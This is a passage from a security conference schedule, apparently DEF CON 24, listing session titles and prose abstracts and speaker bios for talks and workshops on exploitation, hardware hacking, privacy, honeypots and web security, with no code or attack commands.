BHV-Skyview 4-WELCOME TO BHV! Day 2
BHV-Skyview 4-WELCOME TO BHV!
BHV-Skyview 4-WELCOME TO THE LAST DAY OF BHV!
SkyTalks-Skyview 3-What's Lurking Inside MP3 Files That Can Hurt You?
CPV-Bronze 2-When Privacy Goes Poof! Why It's Gone and Never Coming Back
HHV-Contest Area-Why Ham Radio (still!) in the age of the Internet? And other projects.
SkyTalks-Skyview 3-Why Snowden's Leaks Were Inevitable
Workshops-Las Vegas Ballroom 2-Windows Breakout and Privilege Escalation Workshop
HHV-Contest Area-Workshop-Hands on JTAG for Fun and Root Shells II
Workshops-Las Vegas Ballroom 3-Writing Your First Exploit
Workshops-Las Vegas Ballroom 7-XSS Remediation: All the questions you were wise enough to ask, but your security team is too afraid to answer
SE-Palace 2-5-You are being manipulated.
WOS-Skyview 6-You Are Being Manipulated
Workshops-Las Vegas Ballroom 2-You CAN haz fun with cars!
Talk/Event Descriptions
DEFCON - Track One - Saturday - 16:00-16:59
'Cyber' Who Done It?! Attribution Analysis Through Arrest History
Jake Kouns CISO, Risk Based Security
There have been over 20,000 data breaches disclosed exposing over 4.8 billion records, with over 4,000 breaches in 2015 alone. It is clear there is no slowdown at all and the state of security is embarrassing. The total cybercrime cost estimates have been astronomical and law enforcement has been struggling to track down even a fraction of the criminals, as usual.
Attribution in computer compromises continues to be a surprisingly complex task that ultimately isn’t definitive in most cases. Rather than focusing on learning from security issues and how companies can avoid these sorts of data breaches in the future, for most media outlets the main topic after a breach continues to be attribution. And if we are honest, the media have painted an "interesting" and varied picture of "hackers" over the years, many of which have caused collective groans or outright rage from the community.
The Arrest Tracker project was started in 2011 as a way to track arrests from all types of "cyber" (drink!) and hacking related incidents. This project aims to track computer intrusion incidents resulting in an arrest, detaining of a person or persons, seizure of goods, or other related activities that are directly linked to computer crimes.
The Arrest Tracker project currently has 936 arrests collected as of 4/23/2016. How does tracking this information help and what does the data tell us? A lot actually! Who is behind these data breaches and what are the demographics such as average age, gender, and nationality? Which day of the week are you most likely to be arrested? How many arrests lead to assisting authorities to arrest others? How many work by themselves versus part of a group? These observations, and a lot more, paint an interesting picture of the computer crime landscape.
Jake Kouns is the CISO for Risk Based Security, which provides vulnerability and data breach intelligence. He has presented at many well-known security conferences including DEF CON, Black Hat, DerbyCon, FIRST, CanSecWest, RSA, SOURCE, SyScan and many more. He is the co-author of the books Information Technology Risk Management in Enterprise Environments (Wiley, 2010) and The Chief Information Security Officer (IT Governance, 2011). With all of that said, many people are shocked to find out that he has a CISO title, and many others can’t believe that he has been attending DEF CON since the good old days of Alexis Park!
Twitter: @jkouns
Risk Based Security
DEFCON - Track One - Friday - 16:00-16:59
Robot Hacks Video Games: How TASBot Exploits Consoles with Custom Controllers
Allan Cecil (dwangoAC) President, North Bay Linux User's Group
TASBot is an augmented Nintendo R.O.B. robot that can play video games without any of the button mashing limitations we humans have. By pretending to be a controller connected to a game console, TASBot triggers glitches and exploits weaknesses to execute arbitrary opcodes and rewrite games. This talk will cover how these exploits were found and will explore the idea that breaking video games using Tool-Assisted emulators can be a fun way to learn the basics of discovering security vulnerabilities. After a brief overview of video game emulators and the tools they offer, I'll show a live demo of how the high accuracy of these emulators makes it possible to create a frame-by-frame sequence of button presses accurate enough to produce the same results even on real hardware. After demonstrating beating a game quickly, I'll show how the same tools can be used to find exploitable weaknesses in a game's code that can be used to trigger Arbitrary Code Execution, ultimately treating the combination of buttons being pressed as opcodes. Using this ability, I'll execute a payload that will connect a console directly to the internet and will allow the audience to interact with it. An overview of some of the details that will be described in the talk can be found in an article I coauthored for the PoC||GTFO journal (Pokemon Plays Twitch, page 6).
Allan Cecil (dwangoAC) is the President of the North Bay Linux User's Group. He acts as an ambassador for Tasvideos.org, a website devoted to using emulators to complete video games as quickly as the hardware allows. He participates in Games Done Quick charity speedrunning marathons using TASBot to entertain viewers with never-before-seen glitches in games. By day, he is a senior engineer at Ciena Corporation working on OpenStack Network Functions Virtualization orchestration and Linux packet performance optimization testing.
Twitter: @MrTASBot
Twitch.TV: dwangoac
YouTube: dwangoac
CPV - Bronze 1 - Sunday - 12:00-13:00
Talk Title:
"My Usability Goes to 11": A Hacker's Guide to User Experience Research
Speaker Name, Employer or position:
Greg Norcie - Staff Technologist at Center for Democracy & Technology
Abstract:
Tor. PGP. OTR. We have privacy enhancing technologies (PETs), but when was the last time you used privacy software that just worked? Just like security cannot be an afterthought bolted on after the software is written, neither can usability. In this talk, we will discuss why usable PETs are important, why creating usable PETs is challenging, and conclude by describing a real usability evaluation of the Tor Browser Bundle, with a focus on how hackers can perform practical usability evaluations of their own, using tools from the fields of experimental psychology and behavioral economics.
Bio:
Greg Norcie is a Staff Technologist at the Center for Democracy and Technology. Before he dropped out of his PhD to move to DC and fight in the crypto wars, Greg was a PhD student doing usable security research at Indiana University, where he performed the first peer-reviewed lab study of the Tor Browser Bundle's usability.
Social media links if provided:
@gregnorc
DEFCON - Track Two - Friday - 13:00-13:59
(Ab)using Smart Cities: The Dark Age of Modern Mobility
Matteo Beccaro CTO, Opposing Force
Matteo Collura Electronic Engineering Student, Politecnico di Torino
Over the last few years our world has been getting smarter and smarter. We may ask ourselves: what does smart mean? It is the possibility of building systems which are nodes of a more complex network, digitally connected to the internet and to the end users. Our cities are becoming one of those networks, and over time more and more elements are getting connected to such a network: from traffic lights to information signs, from traffic and surveillance cameras to transport systems.
This last element, also called Smart Mobility, is the subject of our analysis. We divide it into three sub-elements, each describing a different method of transport in our city:
- Private transport: for this method we analyze the smart alternatives aimed at making parking easy, hassle free and more convenient.
- Shared transport: we focus our attention on systems which share transport vehicles. In particular we deal with bike sharing, which seems to be the most widespread system in European cities.
- Public transport: the object of our analysis for this section is the bus, metro and tram network.
The aim of our analysis is to understand the ecosystem each element belongs to and to perform a security evaluation of that system. In this way the most plausible attack and fraud scenarios are pointed out and the presence of proper security measures is checked.
All the details discussed here are collected from a sample city, but the same methodology and concept can be applied to most of the smart cities in the world.
Matteo Beccaro is a security researcher, enrolled in Computer Engineering at Politecnico di Torino. He's co-founder and CTO of Opposing Force s.r.l., the first Italian offensive physical security company. Matteo works and researches on network protocols, NFC and EACS security. He's been selected as a speaker at some of the most prestigious international conferences, including DEF CON 21, 30th Chaos Communication Congress (30C3), BlackHat USA Arsenal 2014, DEF CON 22 SkyTalks, BlackHat Europe 2014, TetCon 2015, DEF CON 23 and ZeroNights 2015. As Chief Technical Officer of Opposing Force, Matteo works on vulnerability research activities and building physical intrusion.
Twitter: @_bughardy_
Matteo Collura is a student of Electronic Engineering at Politecnico di Torino. He has been studying wireless networks and in the last few years has focused on NFC and Bluetooth. He presented the results of a progressive work of research at several conferences: DEF CON 21 (Las Vegas, 2013), 30C3 (Hamburg, 2013), DEF CON Skytalks (Las Vegas, 2014), BlackHat USA 2014 Arsenal (Las Vegas), DEF CON 23 (Las Vegas, 2015) and ZeroNights 2015 (Moscow). He is going to continue his studies with an MSc in Electronic Engineering, Systems and Controls.
Twitter: @eagle1753
SE - Palace 2-5 - Saturday - 17:00-17:55
Jayson Street
Jayson E. Street is an author of the “Dissecting the hack” series and the DEF CON Groups Global Coordinator. He has also spoken at DEF CON, DerbyCon, UCON and at several other ‘CONs and colleges on a variety of Information Security subjects. His life story can be found on Google under “Jayson E. Street”. He is a highly carbonated speaker who has partaken of pizza from Beijing to Brazil. He does not expect anybody to still be reading this far, but if they are, please note he was chosen as one of Time’s persons of the year for 2006.
IOT - Bronze 4 - Sunday - 10:00-11:59
0-day Hunting - TBA
No description available
BHV - Skyview 4 - Saturday - 15:00-15:59
Speaker: Tarah
@tarah
About Tarah:
Bio pending.
Abstract:
As more and more people explore human-embedded technology such as subdermal RFID chips and magnetic implants, we must begin to engage with mainstream concerns about where humanity ends and technology begins. Where is the thin silicon line between humanity and cybernetics, and what do the major faiths of the world say regarding the possible diminution of the human soul in the presence of life-altering tech implants? Let’s explore the very real future choice between the hope of Nirvana in the afterlife, and the possibility of eternal Earthly existence as binary data.
DEFCON - DEF CON 101 - Friday - 16:00-16:59
101 Ways to Brick your Hardware
Joe FitzPatrick SecuringHardware.com
Joe Grand (Kingpin) Grand Idea Studio
Spend some time hacking hardware and you'll eventually render a piece of equipment unusable either by accident or intentionally. Between us, we've got decades of bricking experience that we'd like to share. We'll document the most common ways of temporarily or permanently damaging your hardware and ways to recover, if possible. We'll also talk about tips on how to avoid bricking your projects in the first place. If you're getting into hardware hacking and worried about messing something up, our stories will hopefully prevent you from experiencing the same horrors we did. If you're worried about an uprising of intelligent machines, the techniques discussed will help you disable their functionality and keep them down.
Joe FitzPatrick is an Instructor and Researcher at https://SecuringHardware.com. Joe has spent over a decade working on low-level silicon debug, security validation, hardware penetration testing, and hardware security training. In between training and bricking hardware, Joe is busy developing new course content or working on contributions to the NSA Playset and other misdirected hardware projects.
Twitter: @securelyfitz
Joe Grand, also known as Kingpin, is a computer engineer, hardware hacker, former DEF CON badge designer, runner, daddy, honorary doctor, TV host, member of L0pht Heavy Industries, and the proprietor of Grand Idea Studio.
Twitter: @joegrand
DEFCON - DEF CON 101 - Friday - 12:00-12:59
411: A framework for managing security alerts
Kai Zhong Application Security Engineer, Etsy
Kenneth Lee Senior Security Engineer, Etsy
Modern web applications generate a ton of logs. Suites like ELK (Elasticsearch, Logstash, Kibana) exist to help manage these logs, and more people are turning to them for their log analysis needs. These logs contain a treasure trove of information regarding bad actors on your site, but surfacing that information in a timely manner can be difficult. When Etsy moved over from Splunk to ELK in mid-2014, we realized that ELK lacked necessary functionality for real-time alerting. We needed a solution that would provide a robust means of querying ELK and enrich the data with additional context. We ended up creating our own framework to give us this functionality. We’ve named this open-source framework 411.
We designed 411 as a solution for detecting and alerting on interesting anomalies and security events. The Security team at Etsy was interested in using this functionality to detect everything from XSS to potential account compromises.
First, we’ll start off with a discussion of what you should be logging into Elasticsearch. This is important to help you create useful, actionable alerts in 411. We’ll note a number of configuration tips and tricks to help you get the most out of your ELK cluster. From there, we’ll dive into 411’s features and how it allows the Etsy security team to work effectively. We’ll conclude with two demos of 411 in action.
This presentation will show you several examples of useful searches you can build in 411 and how this data can be manipulated to generate clear, actionable alerts. We’ll demonstrate the built-in workflow for responding to alerts and how 411 allows you to pull up additional context as you work on an alert. Additionally, while much of our discussion will be centered around ELK, 411 can in fact be used with a variety of data sources (several of these sources are built into 411).
Whether you’re a newbie looking to learn more or a security veteran with an established system, 411 will help change the way you handle security alerts.
Kai is a security engineer at Etsy. At work, he fiddles around with security features, works on 411 and responds to the occasional bug bounty report. He went to NYU-Poly and got a degree in Computer Science, with an MS in Computer Security. In his free time, he enjoys reverse engineering, CTFs, board games, starting yet another project that he’ll never finish and learning all the things.
Twitter: @sixhundredns
Kenneth Lee is a senior product security engineer at Etsy.com, working on everything from managing the bug bounty program to shattering the site with new vulnerabilities. Previously, Kenneth worked at FactSet Research Systems preventing The Hackers from stealing financial data. He went to Columbia and got an MS in computer science focusing on computer security. Between sweet hacks, Kenneth enjoys drinking tea and force feeding Etsy's operations team with Japanese chocolates.
Twitter: @kennysan
SE - Palace 2-5 - Friday - 18:00-18:55
Chris Hadnagy
Chris is the sole defender of those who do not want to hear Hornsby. His passion for SE is only matched by his passion for the NoHornsby movement.
SkyTalks - Skyview 3 - Friday - 13:00-13:59
Speakers: Joseph, nephitejnf
Talk: A Guide to Outsmarting the Machines
In this talk we'll be exploring alternatives to traditional education and supplements to it. Joseph will be drawing on his experiences in education to give his observations and solutions to the holes in our current education system, because the machines should be the last of our problems. We'll be taking the hacker spirit and putting it into education.
DEFCON - DEF CON 101 - Saturday - 16:00-16:59
A Journey Through Exploit Mitigation Techniques in iOS
Max Bazaliy Staff Engineer, Lookout
Over the past year, Apple has consistently added features to prevent exploitation of the iOS kernel. These features, while largely misunderstood, provide a path to understanding the iOS security model going forward. This talk will examine the history of iOS’s exploit mitigations from iOS 8 to iOS 9.3 in order to teach important features of the architecture. This talk will cover various enhancements that stop attackers from dynamically modifying the functionality of system services, and which have also resulted in the defeat of all known exploitation through function hooking. Additionally, we will explore how PLT interception and direct memory overwrite are no longer options for exploit writers because of recent changes. Finally, we will cover the code-signing mechanism in depth, its userland and kernel implementations, and possible ways to bypass code-sign enforcement.
Max Bazaliy is a security researcher at Lookout. He has over 9 years of experience in the security research space. Max has experience in native code obfuscation, malware detection and iOS exploitation. Before joining Lookout Max was working in malware research and software protection areas, most recently at Bluebox Security. Currently he is focused on mobile security research, XNU and LLVM internals. Max holds a Master's degree in Computer Science.
Twitter: @mbazaliy
DEFCON - Track Two - Friday - 14:00-14:59
A Monitor Darkly: Reversing and Exploiting Ubiquitous On-Screen-Display Controllers in Modern Monitors
Ang Cui PHD, CEO & Chief Scientist, Red Balloon Security
Jatin Kataria Principal Research Scientist, Red Balloon Security
Francois Charbonneau Research Scientist, Red Balloon Security
There are multiple x86 processors in your monitor! OSD, or on-screen-display controllers are ubiquitous components in nearly all modern monitors. OSDs are typically used to generate simple menus on the monitor, allowing the user to change settings like brightness, contrast and input source. However, OSDs are effectively independent general-purpose computers that can: read the content of the screen, change arbitrary pixel values, and execute arbitrary code supplied through numerous control channels. We demonstrate multiple methods of loading and executing arbitrary code in a modern monitor and discuss the security implication of this novel attack vector.
We also present a thorough analysis of an OSD system used in common Dell monitors and discuss attack scenarios ranging from active screen content manipulation and screen content snooping to active data exfiltration using Funtenna-like techniques. We demonstrate a multi-stage monitor implant capable of loading arbitrary code and data encoded in specially crafted images and documents through active monitor snooping. This code infiltration technique can be implemented through a single pixel, or through subtle variations of a large number of pixels. We give a step-by-step walk-through of our hardware and software reverse-analysis process of the Dell monitor. We present three demonstrations of monitor exploitation to show active screen snooping, active screen content manipulation and covert data exfiltration using Funtenna.
Lastly, we discuss realistic attack delivery mechanisms, show a prototype implementation of our attack using the USB Armory and outline potential attack mitigation options. We will release sample code related to this attack prior to the presentation date.
Dr. Ang Cui is the Founder and Chief Scientist of Red Balloon Security. Dr. Cui received his PhD from Columbia University in 2015. His doctoral dissertation, titled "Embedded System Security: A Software-based Approach", focused exclusively on scientific inquiries concerning the exploitation and defense embedded systems. Ang has focused on developing new technologies to defend embedded systems against exploitation. During the course of his research, he has uncovered a number of serious vulnerabilities within ubiquitous embedded devices like Cisco routers, HP printers and Cisco IP phones. Dr. Cui is also the author of FRAK and the inventor of Software Symbiote technology. Ang has received various awards on his work on reverse engineering commercial devices and is also the recipient of the Symantec Graduate Fellowship and was selected as a DARPA Riser in 2015.
Jatin Kataria is a Principal Research Scientist at Red Balloon Security. His research focus is on the defense and exploitation of embedded devices. Jatin earned his master’s degree from Columbia University and a bachelor’s degree from Delhi College of Engineering. Previously, he has worked as a System Software Developer at NVIDIA and as an Associate Software Engineer at Mcafee.
Francois Charbonneau is an embedded security researcher who spent the better part of his career working for the Canadian government until he got lost and wandered into New York City. He now works as a research scientist for Red Balloon Security, where he lives a happy life, trying to make the world a more secure place, one embedded device at a time.
DEFCON - Track Two - Saturday - 17:00-17:59
Abusing Bleeding Edge Web Standards for AppSec Glory
Bryant Zadegan Application Security Advisor & Mentor, Mach37
Ryan Lester CEO & Chief Software Architect, Cyph
Through cooperation between browser vendors and standards bodies in the recent past, numerous standards have been created to enforce stronger client-side control for web applications. As web appsec practitioners continue to shift from mitigating vulnerabilities to implementing proactive controls, each new standard adds another layer of defense for attack patterns previously accepted as risks. With the most basic controls complete, attention is shifting toward mitigating more complex threats. As a result of the drive to control for these threats client-side, standards such as SubResource Integrity (SRI), Content Security Policy (CSP), and HTTP Public Key Pinning (HPKP) carry larger implementation risks than others such as HTTP Strict Transport Security (HSTS). Builders supporting legacy applications actively make trade-offs between implementing the latest standards versus accepting risks simply because of the increased risks newer web standards pose. In this talk, we'll strictly explore the risks posed by SRI, CSP, and HPKP; demonstrate effective mitigation strategies and compromises which may make these standards more accessible to builders and defenders supporting legacy applications; as well as examine emergent properties of standards such as HPKP to cover previously unforeseen scenarios. As a bonus for the breakers, we'll explore and demonstrate exploitations of the emergent risks in these more volatile standards, to include multiple vulnerabilities uncovered quite literally during our research for this talk (which will hopefully be mitigated by d-day).
Bryant Zadegan is an application security advisor and mentor at Mach37, a security accelerator focused on pouring substantial dollars into new security technologies. When not driving developers to embrace AppSec in continuous integration, Bryant punches holes in Amazon, Google, Reddit, etc. On days when he'd rather not touch computers, he's usually nowhere to be found near DC.
Twitter: @eganist
Keybase.io/bryant
Ryan Lester is the CEO and chief software architect for Cyph, a web-based one-click end-to-end-encrypted communications service funded in part by Mach37, Virginia's Center for Innovative Technology, and the Goel Fund. Since departing SpaceX, Ryan has dedicated the better part of a year and a half to the vision of accessible encrypted communication. Unsurprisingly, when he isn't working on building the logic for Cyph, he's usually looking for ways to break it.
Twitter: @theryanlester
SkyTalks - Skyview 3 - Saturday - 13:00-13:59
Speaker: Shaf Patel
Talk: Accessibility: A Creative Solution to Living Without Sight
In this presentation, I will be discussing the various methods blind and visually impaired people use to accomplish everyday tasks, with an emphasis on technology, screen reading software and application design from a blind person's perspective. There will be live demos of screen reading software, OCR apps for smartphones, wearable devices and possibly mobility aids if there is time. There will also be a discussion on myths and stigmas relating to blindness, an audience Q&A regarding accommodating those with a visual impairment, and tips and tricks for those who develop applications to include accessibility in their core design.
SkyTalks - Skyview 3 - Sunday - 12:00-12:59
Speakers: Brain, Xian
Talk: Active Incident Response
During the Pacnet breach in 2015, we developed a method which differs from the usual IR process for targeted attacks, utilising what we have termed Full Spectrum Visibility and Targeted Containment which form like Voltron to create Active Incident Response. This method, utilising threat intelligence, hunting and establishing the basis for active defence gives incident responders the information the business needs to assess risk, and another avenue for actions to mitigate that risk. We will demonstrate, using examples from the Pacnet breach and follow-on waves, how Targeted Containment can be used during incident response, the visibility required, and explore actor TTPs, tools and activity associated with this campaign. Expect to see pcap decodes, command-line activity and actor typos.
WOS - Skyview 6 - Friday - 13:10-13:59
Adding Ramparts to Your Bastille: An Introduction to SELinux Hardening
Jay Beale, CTO, COO at InGuardians, Inc.
Has your first action when acquiring a Red Hat system been to deactivate SELinux? In this fast-paced talk, you'll learn how to investigate and understand an SELinux-enabled system, and how to configure it. You'll learn how to build a policy for a new program and modify one for an existing program. Finally, you'll learn about the boolean on-off switches built into the system that keep you from having to modify policies at all. If you want a speedy challenge, bring a CentOS 7 system with the packages listed on http://www.inguardians.com/selinux/ installed.
Jay Beale (Twitter: @jaybeale) has created several security tools, including Bastille Linux/UNIX and the CIS Linux Scoring Tool, both of which have been used throughout industry and government. He has served as an invited speaker, program chair and trainer at many industry and government conferences, a columnist for Information Security Magazine, SecurityPortal and SecurityFocus, and a contributor to nine books, including those in his Open Source Security Series and the ‘Stealing the Network' series. Jay is a founder and the CTO of the information security consulting company InGuardians. He has taught Linux hardening classes since the year 2001, when he got his start at Black Hat.
Workshops - Las Vegas Ballroom 7 - Friday - 14:00-18:00
Advanced Blind SQL Injection Exploitation
David Caissy Web App Penetration Tester, Albero Solutions Inc.
SQL Injection (SQLi) vulnerabilities are the most common injection flaws found in web applications today, ranking number one in the OWASP Top 10 most critical web application security risks. When an attacker is able to find and exploit such a vulnerability, the end result is often disastrous: complete database downloaded, application backdoor created or even remote code execution. Suffice to say that penetration testers need to find these vulnerabilities before the bad guys do.
But vulnerability scanners and automated exploitation tools like sqlmap can only do so much when it comes to finding and exploiting SQLi vulnerabilities. While they do a good job for regular or error-based SQLi vulnerabilities, their success rate lowers drastically when blind SQLi is encountered, especially when time-based attacks are required. And if you need to be quiet on the network, most tools are just insanely noisy…
This course is designed to help penetration testers who have been using these tools to get to the next level, where finding and exploiting SQLi is no longer easy. When only a browser and notepad are available to you or when being quiet is critical, you will be glad you know this stuff.
- SQL crash course for hackers (15 min)
- Error-based SQL Injection (1h 15min)
  - Bypassing login (demo)
  - UNION exploitation techniques (exercise)
- Blind SQL Injection (2h 30min)
  - Splitting and Balancing
  - Boolean exploitation techniques (exercise)
  - Time-based exploitation techniques (exercise)
- Bonus exercise: Exploiting error-based SQLi and blind SQLi using sqlmap
David Caissy, M. Sc., OSCP, GWAPT, GPEN, GSEC, CISSP, CEH is a web application penetration tester with in-depth developer and IT Security background spanning over 16 years. He has extensive experience in conducting vulnerability assessments and penetration tests as well as providing training globally, amongst numerous other teaching engagements. He has worked for a central bank, the Department of National Defense, various government agencies and private companies. David has been teaching web application security in colleges, conferences and for many government agencies over the last 15 years.
Max Class Size: 55
Prerequisites for students: This course is for penetration testers who have used sqlmap and other automated tools before, but now want to go to the next level. Basic knowledge of the SQL language is required as well as a basic understanding of error-based SQL injection techniques.
Materials or Equipment students will need to bring to participate: Participants need to bring a laptop with VMWare Workstation/Player/Fusion or VirtualBox pre-installed. I will give them a virtual machine containing a vulnerable web application where they will be able to do the exercises.
SE - Palace 2-5 - Saturday - 20:00-20:55
Fadli Sidek
Fadli B. Sidek is currently a cyber threat intel analyst for Control Risks. He has been in the IT and security industry for almost 10 years and is still loving it. In the past, he was a security consultant doing VAPT for companies in the AMEA region. He has spoken at several security conferences such as BSidesLV, DefCamp, Null Singapore, BSidesVienna and Hackers Conferences in India. He loves reading about security and, most importantly, traveling the world to attend conferences, share his knowledge and learn from others. Neither a guru nor an expert, simply a security over-enthusiast.
Description: In the last couple of years, the number of cases of people being scammed online has risen gradually, and as more people become connected to the online world, so does the number of scammers. Scam cases, from online dating scams, winning lottery scams and free credit card scams to, of course, the Nigerian prince who wants to send millions of dollars to your bank account, are some of those that have been hitting innocent victims the most. Although many such cases are reported online and in print, many people are still falling victim to such malicious incidents. Recent news by Channel News Asia reported that Singaporeans have been the main target of online scams, and GET REAL even published a documentary about the victims of cyber/online scams.
According to the Singapore Police Force (SPF), there were 16,575 crime cases recorded in the first six months of 2015, an increase of 6.7 per cent over the same period of 2014. In the latest report by the SPF, a total of 33,608 cases were recorded last year, up from 32,315 cases in 2014. Online commercial crimes rose by 95 per cent to 3,759 cases, up from 1,929 cases in 2014, which pushed Singapore’s crime up 4%, driven mostly by cybercrime.
DEFCON - Track Two - Saturday - 16:30-16:59
All Your Solar Panels are Belong to Me
Fred Bret-Mounet Hacker
I got myself a new toy: A solar array... With it, a little device by a top tier manufacturer that manages its performance and reports SLAs to the cloud. After spending a little time describing why it tickled me pink, I'll walk you through my research and yes, root is involved! Armed with the results of this pen test, we will cover the vendor's reaction to the bee sting: ostrich strategy, denial, panic, shooting the messenger and more. Finally, not because I know you get it, but because the rest of the world doesn't, we'll cover the actual threats associated with something bound to become part of our critical infrastructure. Yes, in this Shodan world, one could turn off a 1.3MW solar array but is that as valuable as using that device to infiltrate a celebrity's home network?
Fred Bret-Mounet's descent into the underworld of security began as a pen tester at @stake. Now, he leads a dual life: info sec leader by day, rogue hacker by night. His life in the shadows and endless curiosity have led to surprising home automation hacks, playing with Particle Photons and trying to emulate Charlie & Chris' car hacking on his i3.
Twitter: @fbret
DEFCON - Track Two - Sunday - 14:00-14:59
An Introduction to Pinworm: Man in the Middle for your Metadata
bigezy Hacker
saci Hacker
What is the root cause of memory and network traffic bloat? Our current research, using tools we previously released (Badger at Black Hat in 2014 and Kobra at BSidesLV 2015), shows a 40 percent increase in outside unique IP traffic destinations and a 400 percent increase in data transmitted towards these destinations. But through the course of the research we found that currently used IRP monitoring tools did not produce enough information to forensically investigate the exfiltration of user metadata. Pinworm is a sniffer that shows all IRPs created in the kernel for I/O devices. The IRPs are correlated with the processes that created them and the driver stack that was called. Combined with network traffic data, we are off to the races. Using Pinworm, which we released this week, we will show forensic case studies from cradle to grave of what happens when you do things online in social media sites.
Like all of our previously released tools, Pinworm is a framework including server side code you can use to collect and display user metadata inline in browser frames. Does this metadata collection happen in the browser, in userland, or in the kernel? Come to our talk and find out. We will demonstrate the collection of user metadata and collecting this information in a live browser session. Then we will show you how to intercept your personal data before it leaves your computer keeping your privacy, well, private. BYOTFH (Bring your own tin foil hat).
bigezy has spent his career defending critical infrastructure, hacking it from the inside to keep things from blowing up. Bigezy got his black badge from DEF CON in 2003. Bigezy currently works as a cyber security researcher at a place where these things are done. During the last 25 years, Bigezy has worked at Fortune 500 companies in the electric sector, financial sector, and telecom. He has spoken at numerous conferences worldwide including BSidesLV and the DEF CON Crypto and Privacy Village last year. Bigezy is also the president of Hackito Ergo Sum in Paris, France. @bigezy_ When you are a one-legged boogeyman slash system internals hacker, every kick is a flying kick.
Twitter: @bigezy
saci takes pride in his disdain for hypocrisy. We are sure you have seen him around in the usual places, and maybe you think you know who he is. But, you will never quite know who he is until you come to the talk.
Twitter: @itsasstime
HHV - Contest Area - Saturday - 12:00-12:59
An Introduction To Pulling Software From Flash via I2C, SPI and JTAG
Matt DuHarte
This beginners' talk is as jargon-free as possible and a great introduction to the world inside all those little devices that make up our world. Not every device we have makes it easy to see the software it runs. How do you analyze the firmware of a device that does not have a display or even a serial port? Simple - pull the software directly from the flash on the device. A new generation of simple and inexpensive hardware devices makes it fast and easy. This talk will introduce just enough of the protocols involved, the devices used to pull a firmware image and the software we use to modify the images and put them back.
Matt will also be hosting a breakout session with demonstrations and Q&A immediately after the talk in the HHV.
Workshops - Las Vegas Ballroom 3 - Friday - 14:00-18:00
Analyzing Internet Attacks with Honeypots
Ioannis Koniaris Security Engineer
In the field of computer security, honeypots are systems aimed at deceiving malicious users or software that launch attacks against the servers and network infrastructure of various organizations. They can be deployed as protection mechanisms for an organization’s real systems, or as research units to study and analyze the methods employed by human hackers or malware. In this workshop we will outline the operation of two research honeypots, by manual deployment and testing in real time. A honeypot system will undertake the role of a web trap for attackers who target the SSH service in order to gain illegal server access. Another one will undertake the role of a malware collector, usually deployed by malware analysts and anti-virus companies to gather and securely store malicious binary samples. We will also talk about post-capture activities and further analysis techniques. As an example, we will see how to index all the captured information in a search engine like Elasticsearch and then utilize ElastAlert, an easy-to-use framework to set up meaningful alerting. Lastly, visualization tools will be presented for the aforementioned systems, plus a honeypot bundle Linux distribution that contains pre-configured versions of the above tools and many more related utilities, which can make the deployment of honeypots in small or large networks an easy task.
Ioannis is an Information Security engineer and researcher, working to protect company assets, data and operations. His general interests are programming, security, development operations (DevOps) and cloud computing, while his academic interests include honeypots, honeyclients, botnet tracking, malware analysis, intrusion detection and security visualization. Ioannis has released a number of utilities to aid information security professionals using honeypots. Some of them are Kippo-Graph, Honeyd-Viz and HoneyDrive, a self-contained honeypot bundle Linux distribution. These tools are used by numerous university researchers and various CERT teams worldwide, and have also been included in the “Proactive detection of security incidents II – Honeypots” report by ENISA (European Union Agency for Network and Information Security).
Max Class Size: 55
Prerequisites for students: Setup of VirtualBox for their OS
Materials or Equipment students will need to bring to participate: Only their laptops.
Demolabs - Table 1 - Saturday - 12:00-13:50
Android-InsecureBank
Dinesh Shetty
This is a major update to one of my previous projects - "InsecureBank". This vulnerable Android application is named "InsecureBankv2" and is made for security enthusiasts and developers to learn about Android insecurities by testing this vulnerable application. Its back-end server component is written in Python. The client component, i.e. the Android InsecureBank.apk, can be downloaded along with the source.
Dinesh leads the Mobile Security Testing Center of Excellence at Security Innovation. He has performed innumerable penetration tests on Web, Mobile and VoIP technologies - however, his core area of expertise is Mobile and Embedded application pentesting and exploitation. He is an accomplished author and speaker, and his research has been published in multiple security zines and sites like Packet Storm, Exploit-DB, PenTest Magazine, SecurityXploded, ClubHACK Magazine, and Exploit-Id amongst others.
DEFCON - DEF CON 101 - Friday - 14:00-14:59
Anti-Forensics AF
int0x80 (of Dual Core), Hacker
This presentation is the screaming goat anti-forensics version of those ‘Stupid Pet Tricks’ segments on late night US talk shows. Nothing ground-breaking here, but we'll cover new (possibly) and trolly (definitely) techniques that forensic investigators haven't considered or encountered. Intended targets cover a variety of OS platforms.
int0x80 is the rapper in Dual Core. Drink all the booze, hack all the things!
Twitter: @dualcoremusic
DualCoreMusic on Facebook
Workshops - Las Vegas Ballroom 7 - Saturday - 10:00-14:00
Applied Physical Attacks on Embedded Systems, Introductory Version
Joe FitzPatrick Instructor & Researcher, SecuringHardware
This workshop introduces several different relatively accessible interfaces on embedded systems. Attendees will get hands-on experience with UART, SPI, and JTAG interfaces on a MIPS-based wifi router. After a brief architectural overview of each interface, hands-on labs will guide attendees through the process of understanding, observing, interacting with, and exploiting the interface to potentially access a root shell on the target.
Joe (@securelyfitz) is an Instructor and Researcher at https://SecuringHardware.com. Joe has spent over a decade working on low-level silicon debug, security validation, and penetration testing of CPUs, SoCs, and microcontrollers. He has spent the past 5 years developing and leading hardware security related training, instructing hundreds of security researchers, pen testers, and hardware validators worldwide. When not teaching Applied Physical Attacks on x86 or Embedded Systems, Joe is busy developing new course content or working on contributions to the NSA Playset and other misdirected hardware projects, which he regularly presents at all sorts of fun conferences.
Max Class Size: 48
Prerequisites for students: No hardware or electrical background is required. Computer architecture knowledge, Linux command-line familiarity, and low-level programming experience helpful but not required.
Materials or Equipment students will need to bring to participate: All equipment, including laptops, will be provided for use in the class. Students will be provided with a lab manual that includes an equipment list of all materials used for the class.
SkyTalks - Skyview 3 - Saturday - 12:00-12:59
Art of Espionage (v.303) - Pyr0, Lizzie Borden
No description available
CPV - Bronze 2 - Saturday - 15:00-16:00
Talk Title:
Ask the EFF: The Year in Digital Civil Liberties
Speaker Name, Employer or position:
Kurt Opsahl, Nate Cardozo, Andrew Crocker, Dr. Jeremy Gillula, Eva Galperin, Katitza Rodriguez - EFF
Abstract:
Get the latest information about how the law is racing to catch up with technological change from staffers at the Electronic Frontier Foundation, the nation's premier digital civil liberties group fighting for freedom and privacy in the computer age. This session will include updates on current EFF issues such as surveillance online, encryption (and backdoors), and fighting efforts to use intellectual property claims to shut down free speech and halt innovation, discussion of our technology project to protect privacy and speech online, updates on cases and legislation affecting security research, and much more. Half the session will be given over to question-and-answer, so it's your chance to ask EFF questions about the law and technology issues that are important to you.
Bio:
